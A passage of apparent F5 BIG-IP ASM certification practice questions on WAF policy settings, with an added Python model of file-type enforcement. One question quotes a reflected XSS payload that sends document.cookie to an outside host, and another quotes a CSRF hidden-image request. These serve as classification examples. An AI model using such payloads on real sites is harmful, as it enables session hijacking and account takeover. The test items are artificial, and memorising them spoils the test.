b) The latest attack signatures are added, and all attack sign
atures from previous updates are deleted
c) The latest attack signatures are added, and all attack signatures from previous updates are included
d) The update only provides new timestamps to existing signatures
e) The update only provides revisions to existing attack signatures, and no new signatures are added

An organization needs to use curl to perform manual testing against a web application protected by an ASM security policy. The ASM policy is in Blocking mode. The ASM Specialist needs to allow the testing to work without compromising the security of the web application. Which step should the ASM Specialist take?
a) change the security policy Enforcement Mode to Transparent
b) add the tester's client IP address to the IP Address Exceptions list
c) enable Signature Staging for the security policy
d) disable Block for the "Automated client access (curl)" Attack Signature

An organization created one of its existing security policies from imported Cenzic vulnerability scan results. The ASM Specialist then re-scans the application using Qualys and needs to import the scan results. How should this be accomplished?
a) configure the IP address and port for the Qualys API destination
b) import the file exported from the Qualys scanner into the existing policy
c) create a new security policy and import the Qualys scanner results
d) supply the username and password for the Qualys account used to scan

An ASM policy is in Transparent mode. The allowed file types list is empty; otherwise, the policy is completely configured. All protections are set to Learn and Alarm. What happens if the policy enforcement mode is changed to Blocking?
a) Only known attacks are logged as illegal
b) All requests are blocked and logged as illegal
c) All requests are logged as illegal
d) Only known attacks are blocked and logged as illegal

An ASM Specialist needs to allow access to only three explicit file types. The ASM Specialist modifies the policy to specify those file types and takes them out of staging. In testing, the ASM Specialist is still able to access other file types. Which additional step does the ASM Specialist need to complete?
a) enable blocking for the Illegal URL violation
b) take the wildcard file type entity out of staging
c) remove the wildcard file type entity
d) change the Enforcement Readiness Period to zero days

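The phpinfo.php, empty-file-type-list and wildcard-file-type questions all concern the positive security model: a request is legal only if its file type (the extension, or "no_ext" when there is none) matches an entry in the allowed list, and the wildcard entry "*" matches everything, which is why the wildcard has to be removed, not merely taken out of staging, before other file types become illegal. The following Python is an added example, not F5 code. It models allowed file types, disallowed URL patterns and the enforcement-mode plus Block-flag decision, and runs the scenarios from those questions through it, including the difference between disallowing /phpinfo.php and disallowing *.php. The policies and paths are constructed; staging and ASM's other URL checks are not modeled.

```python
import fnmatch
from dataclasses import dataclass, field
from typing import Dict, List
from urllib.parse import urlsplit

@dataclass
class Policy:
    enforcement_mode: str                                   # "transparent" or "blocking"
    allowed_file_types: List[str] = field(default_factory=list)  # e.g. ["php", "png", "*"]
    disallowed_urls: List[str] = field(default_factory=list)     # explicit paths or wildcards
    block: Dict[str, bool] = field(default_factory=lambda: {
        "Illegal file type": True, "Illegal URL": True})         # Block flags per violation

def file_type_of(path: str) -> str:
    """ASM-style file type: the extension of the last path segment, or 'no_ext'."""
    last = path.rsplit("/", 1)[-1]
    return last.rsplit(".", 1)[1].lower() if "." in last else "no_ext"

def evaluate_url(policy: Policy, target: str) -> Dict[str, object]:
    """Decide whether a request target is legal, logged and/or blocked."""
    path = urlsplit(target).path
    violations = []
    if any(fnmatch.fnmatchcase(path, pat) for pat in policy.disallowed_urls):
        violations.append("Illegal URL")
    ftype = file_type_of(path)
    if not any(fnmatch.fnmatchcase(ftype, pat) for pat in policy.allowed_file_types):
        violations.append("Illegal file type")
    blocked = (policy.enforcement_mode == "blocking"
               and any(policy.block.get(v, False) for v in violations))
    return {"file_type": ftype, "violations": violations,
            "logged": bool(violations), "blocked": blocked}

if __name__ == "__main__":
    php_types = ["php", "png", "jpg", "gif", "no_ext"]
    scenarios = [
        ("disallow /phpinfo.php only", Policy("blocking", php_types, ["/phpinfo.php"]),
         ["/phpinfo.php", "/index.php"]),
        ("disallow *.php (disrupts traffic)", Policy("blocking", php_types, ["*.php"]),
         ["/phpinfo.php", "/index.php"]),
        ("empty allowed list, transparent", Policy("transparent", [], []), ["/index.php", "/"]),
        ("empty allowed list, blocking", Policy("blocking", [], []), ["/index.php", "/"]),
        ("three types plus wildcard", Policy("blocking", ["png", "jpg", "gif", "*"], []),
         ["/index.php", "/images/logo.png"]),
        ("three types, wildcard removed", Policy("blocking", ["png", "jpg", "gif"], []),
         ["/index.php", "/images/logo.png"]),
    ]
    for label, policy, paths in scenarios:
        for p in paths:
            print(f"{label:34} {p:18} {evaluate_url(policy, p)}")
```

Two of the outcomes are the ones the questions hinge on: with an empty allowed list every request is an illegal file type, so switching to Blocking turns "logged" into "logged and blocked" for all traffic; and with "*" still in the list nothing is ever an illegal file type, whatever its staging state.
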
The ASM policy export function minimizes the output by excluding which two configuration settings? (Choose two)
a) File Content Checking
b) File Types
c) Meta-Character set
d) Data Guard Custom Patterns
e) Blocking Pages
f) Parameters
g) Wildcard Order

An organization has a web application protected by the ASM system with the "UTF-8" application language. The application team needs additional language support for the web application for French, Arabic and Spanish. These languages will serve the same web content. The application team has specified a different Application Language, "Western European (iso-8859-15)", to support Arabic; the other languages must keep using "UTF-8" as the Application Language. Each language must be accessible over a different URI. An ASM Specialist needs to incorporate the new language support while keeping the existing web application secure. How should the ASM Specialist meet this requirement?
a) 1. Create a new ASM policy with the "Western European (iso-8859-15)" Application Language. 2. Apply an LTM policy with rules for each URI and the appropriate ASM policy to the virtual server.
b) 1. Export the existing web application ASM policy. 2. Modify the Application Language to "Western European (iso-8859-15)". 3. Import the updated ASM policy and apply it to the web application virtual server.
c) 1. Modify the existing ASM policy.

An ASM Specialist manually creates a policy in "Blocking mode" for the hostname "www.worldbank.com". A second DNS registration was made using the same IP address with a new FQDN of www.mobilebank.com. Users are blocked by the ASM Security Policy when they try to connect to www.mobilebank.com. What configuration within "Security > Application > Security > Headers > Host Names" will allow all users to access the new FQDN? remove the current hostname select the current hostname and enable "Include Sub-domains" add all required hostnames select the current hostname and disable "Include Sub-domains".
Refer to the exhibit. The ASM Specialist activates Data Guard functionality. A penetration test finds leaks of some sensitive data. Why is the request shown NOT blocked by Data Guard? Data Guard is NOT set to blocking The provided number is an invalid credit card number The ASM Policy is in transparent mode The appropriate attack signature is in staging mode.
An organization has a BIG-IP ASM system configured with many XML schemas assigned to multiple policies. While examining recent log entries, the ASM Specialist notices the following error message present in /var/log/asm. What should the ASM Specialist do first? adjust the ASM configuration file issuing the command /usr/shared/ts/bin/add_del_internal add additional_xml_memory_in_mb 0 adjust the ASM configuration file issuing the command /usr/shared/ts/bin/add_del_internal add total_xml_memory 0 adjust the additional_xml_memory_in_mb variable in the System Variables section of the BIG-IP ASM Configuration utility adjust the total_xml_memory variable in the System Variables section of the BIG-IP ASM Configuration Utility.
A web application is developed with a Reflected XSS vulnerability in the dynamic error page of the website. How is the security of the web application affected? The user's browser password database can be accessed by an attacker using JavaScript from the client side A URL that contains JavaScript can be sent to the user, which allows the session token to be captured from the server side. An attacker can capture a client username and password using keyboard logging from the server side A URL that contains JavaScript can be sent to the user, which allows the session token to be captured from the client side.
An ASM Specialist configures Data Guard for credit card numbers with Mask Data enabled. The policy is set to transparent mode. Data Guard is set to blocking. What happens to a response that contains a credit card number? The response is blocked and logged The response is logged as illegal and passed to the client unchanged The response is passed to the client unchanged The number is masked, logged and passed to the client.
An existing AJAX application that already has an ASM policy defined in Fundamental mode is planning a code upgrade. The new version of code will use JSON for data transfer and will contain password transfer in a JSON parameter. An ASM Specialist needs to modify the existing ASM policy to support its new version of code. Which change should the ASM Specialist make to the policy for the existing ASM deployment? Define and associate a Header-Based Content Profile for the parameter that contains sensitive data. Build a new policy in Enhanced mode and select the "JSON/XML payload detection" check box Override JSON Profile settings in the AJAX application's policy with the Overridden Security Policy Settings list Create a Content Profile for JSON traffic and define elements to be masked in Sensitive Data Configuration.
A dictionary attack has been detected against several applications protected by the ASM policy, with an average rate of 50 failed login attempts a second. The ASM Specialist configures a login page within the policy and sets the "Maximum login attempts are exceeded" violation to block. The ASM policy is in Blocking mode. Which method should the ASM Specialist use to determine if the attack has been successfully mitigated? Attempt to log in to the applications with a JavaScript-disabled browser to mimic the performance of a bot. View the Event Logs for Client Side Integrity Defense responses to attempted logins on the protected pages. View the Dashboard to identify spikes in the network traffic caused by the failed login attempts. View the Brute Force Attack section of the event logs to look for login attempts over the maximum.
An ASM Security Policy contains a parameter that should have some meta characters allowed on one URL, but NOT on the rest of the policy. How should the ASM Specialist configure the adjustments? go to the URL, create the parameter and allow the meta characters go to the parameter itself and allow the required meta characters go to parameter value character sets and allow the required meta characters go to the Learning and Blocking settings and allow the meta characters in the parameter section.
An ASM Specialist tries to import White Hat Sentinel Vulnerability scanner results to modify an existing security policy. The attempt fails. How should the ASM Specialist fix this issue? retrieve an API key to use for access to the White Hat service to import scan results and configure it within ASM create a new security policy and select "Create a security policy using third party vulnerability assessment tool output" import the XML file generated by the White Hat tool to populate vulnerabilities within ASM reconfigure the security policy to update vulnerabilities based on generic XML formats.
An ASM Specialist needs to drop traffic from the Botnets category. Which two items must the ASM Specialist configure to meet this requirement? (Choose two) Anomaly Detection Session Tracking Attack Signatures Blocking Enforcement Mode Address Intelligence.
An organization deploys a new ASM Security Policy in Blocking mode with Learning mode set to Manual. All Attack signatures of the ASM Security Policy are only set to Learn. How does the ASM Security Policy handle a request that matches an Attack Signature? Illegal requests are logged, blocked and have learning available Illegal requests have learning available Illegal requests are logged and have learning available Illegal requests are logged.
An ASM Specialist needs to log all requests that go through the ASM module. Illegal requests must be stored on this system whenever possible. The ASM Specialist needs to meet these requirements with minimal possible effect on the system. Which logging configuration is required to perform this task? create one logging profile to log all requests locally on the ASM system create one logging profile to log all illegal requests locally on the ASM system with the Guarantee Local Logging option disabled and another profile to log all requests remotely create one logging profile to log all requests to the remote storage create one logging profile to log all illegal requests locally on the ASM system with the Guarantee Local Logging option enabled and another profile to log all requests remotely.
Which two configuration procedures could an ASM Specialist perform to configure the ASM module to download the attack signature update files over the Internet? (Choose two) Update the Attack Signature Download License Update files through a USB drive Update files using a manual update mode Update files using Data Guard.
An attacker is trying to upload a Windows executable file to the website behind ASM. The attacker changes the file name of the executable file from adb.exe to adb.jpg. Which two actions should the ASM Specialist take to block the attack? (Choose two) check "Disallow File Upload of Executables" on the file upload parameter create "img" and "exe" type in Disallowed File Types List create "/data/adb.exe" URL entry in the Disallowed URL List check "Illegal file type" in Block settings check "Disallowed file upload content detected" in Block settings.
An ASM Specialist is deploying a new application security policy using the automatic policy building option and needs to learn explicit parameters at the URL level. Which policy type within the automatic policy builder should the ASM Specialist use? Comprehensive Enhanced Fundamental Advanced.
Refer to the exhibit. An organization has recently changed web server password requirements. The password requirements are a maximum of 20 characters. The following special characters are allowed for passwords: ?@*-/)(%&#! After the organization changes the password requirements, users are unable to change their passwords. Which configuration changes should be made to meet the organization requirements? use RegEx to define the allowed characters override the Value Meta Characters for the allowed special characters modify the maximum length to 20 disable the "Check characters on this parameter" value.
An ASM Specialist needs to log violations for unauthenticated users who try to access restricted resources. What must be configured? Basic attack signatures Bot Detection create a Disallowed URL in URLs list User Defined attack signatures enable Alarm flag for Illegal URL in Learning and Blocking Settings.
An ASM Specialist has enabled CSRF Protection in blocking mode in the ASM policy, but CSRF attacks are NOT being blocked. Which two ASM policy settings could result in this issue? (Choose two) The Alarm box is unchecked for "CSRF Attack Detected" SSL Only is enabled, but the URL to be protected does NOT use SSL The URL to be protected has NOT been added to the URLs List The expiration time for CSRF protection has NOT been specified CSRF token expirations are NOT being Learned.
The web page, http://example.com/sendmail.php, allows users to forward email with the following form: <form action="/account/edit" method="post"> <p>Email: <input type="text" name="email" /></p> <p><input type="submit" /></p> </form> An attacker's web page includes the following code: <img height="0" width="0" src="http://example.com/account/edit?email=attacker@email.tld" /> The original website is vulnerable to which type of attack? Cross-Site Request Forgery SSL Injection Mail Command Injection Forceful Browsing.
An ASM Specialist must implement session tracking for http://example.com/sales.aspx. After configuring this option, no sessions are logged. Malicious traffic is blocked for this application. How can this problem be solved? ASM cannot decrypt the SSL traffic A user profile needs to be configured A login page needs to be configured Configure the login enforcement feature.
An ASM Specialist modifies a policy to enable Blocking mode. This configuration change blocks a business partner due to an excessive number of legitimate sessions to a specific web host. The ASM Specialist must make sure that requests that originate from this third party to this web host are not blocked due to session counts. The changes made by the ASM Specialist should maintain all other security protections. Which property should the ASM Specialist modify in the IP exception list to meet this requirement? never block this IP address ignore in Anomaly Detection and do not collect device ID ignore IP address intelligence policy builder trusted IP.
An organization needs to ensure that a competitor does NOT steal pricing information from their website. The organization needs to block these requests while still allowing search engines to index the site. Which protection mechanism should be enabled? Session Awareness Web Scraping Login Enforcement Brute Force Attack Prevention.
What does the violation "Disallowed file upload content detected" indicate? Anti-virus protection flagged the uploaded content as malicious Uploaded content is a binary executable The number of permitted uploads is exceeded for this session The uploaded content matches an attack signature.
An attacker tries to access an organization's corporate homepage by sending the following HTTP request http://1.1.1.1/search.asp?q=<script>x=newImage; x.src=http://deposit.mysite.com/hijackedsession.php?season-cookie=+document.cookie;</script> According to the OWASP Top 10, what type of attack is this? Sensitive Data Exposure Cross-Site Scripting Broken Authentication or Session Management Unvalidated Redirects and Forwards.
Refer to the exhibit. An ASM policy protects a page that provides Ajax data and static content. The URL configuration for the ASM Security Policy shown is NOT working correctly. How should an ASM Specialist fix this problem? add the Content Type application/json to the Header-Based Content Profiles for the URL add the content-type http-json to the Header Based Content Profiles for the URL enable Clickjacking Protection on the URL set the default Request Body Handling to be JSON.
Which option should be enabled in a security policy to mitigate the potential attacks present on the request? Multiple Decoding to consider an evasion after two passes Bad multipart/form-data request parsing violation Clickjacking protection for the URL /content.php Sensitive parameter option for the parameter "document".
An ASM module is configured to block U.S Social Security Numbers, but the numbers are NOT being blocked. What should the ASM Specialist check to determine the cause of this issue? Evasion Techniques Content Profiles Enforcement Mode Sensitive Parameters.
A web application is protected by an ASM Security Policy. An additional request is to block all requests from China. The ASM Specialist reviews the Event Logs. Some requests that are NOT blocked come from public addresses classified as N/A. The ASM Specialist concludes that those addresses are from Chinese address space. What should the ASM Specialist do to make sure those attacks are mitigated in the future? write custom signatures and review Event Logs again update the IP Intelligence database and review Event Logs again update the Geolocation database and review Event Logs again blacklist every address that is classified as N/A and review Event Logs again.
An organization deploys a new ASM Security Policy in Blocking mode with Learning mode set to Manual. All Attack Signatures are set to Alarm and Block. How does the ASM Security Policy handle a request that matches an Attack Signature? Illegal requests are logged, learning is unavailable, and they are blocked Illegal requests are logged, learning is unavailable, and they are NOT blocked Illegal requests are NOT logged, learning is available and they are blocked Illegal requests are NOT logged, learning is available and they are NOT blocked.
The password parameter in the event logs for an organization is shown in clear text. Per organization policy, the password should be masked to mitigate security concerns. What should the ASM Specialist configure in the ASM Security Policy to meet this requirement? enable Sensitive Parameter for the username parameter enable Sensitive Parameter for the password parameter remove response logging from the logging profile delete the username and password from the Parameter List.
An ASM Specialist is configuring a web application for HTTP and NO transport encryption. The web application request contains an authentication cookie in plain text. The web application is vulnerable to which type of attack? Parameter Bypass SQL Hijacking Session Bypass Session Hijacking.
An ASM module is running in production. The CPU load is above 75%. Which two actions should an ASM Specialist take to reduce the load? (Choose two) exclude html files from inspection configure external logging exclude images from inspection configure web scraping protection configure file upload protection.
An ASM Specialist is monitoring the memory utilization of the bd process using the "top" command. On the first day, the memory increases, peaking with maximum throughput of the system. On the second day, the memory utilization remains at the peak level and does NOT release back to the system. How should the ASM Specialist respond? No action is necessary provided that further increases in memory are only observed with increases in peak throughput Open a support case and create an asmqkview file for upload to iHealth and monitor /var/log/asm for errors Disable the Automatic Policy builder and monitor the ASM instance memory Set bypass_upon_asm_down system variable in Security >> Options >> Protocol >> Security and restart the bd daemon.
An ASM policy build includes the following elements: - A stress-based DoS strategy - By URL attack detection method - Request Blocking mitigation method - Heavy URLs protection is configured Some URL requests have the potential to cause stress on the server, even with a low TPS count. The ASM Specialist must confirm that the value associated with backend server response time is as close as possible to the actual value. Which report should the ASM Specialist interpret to locate the correct value? Event Correlation DoS Overview URL Latencies Session Tracking Status.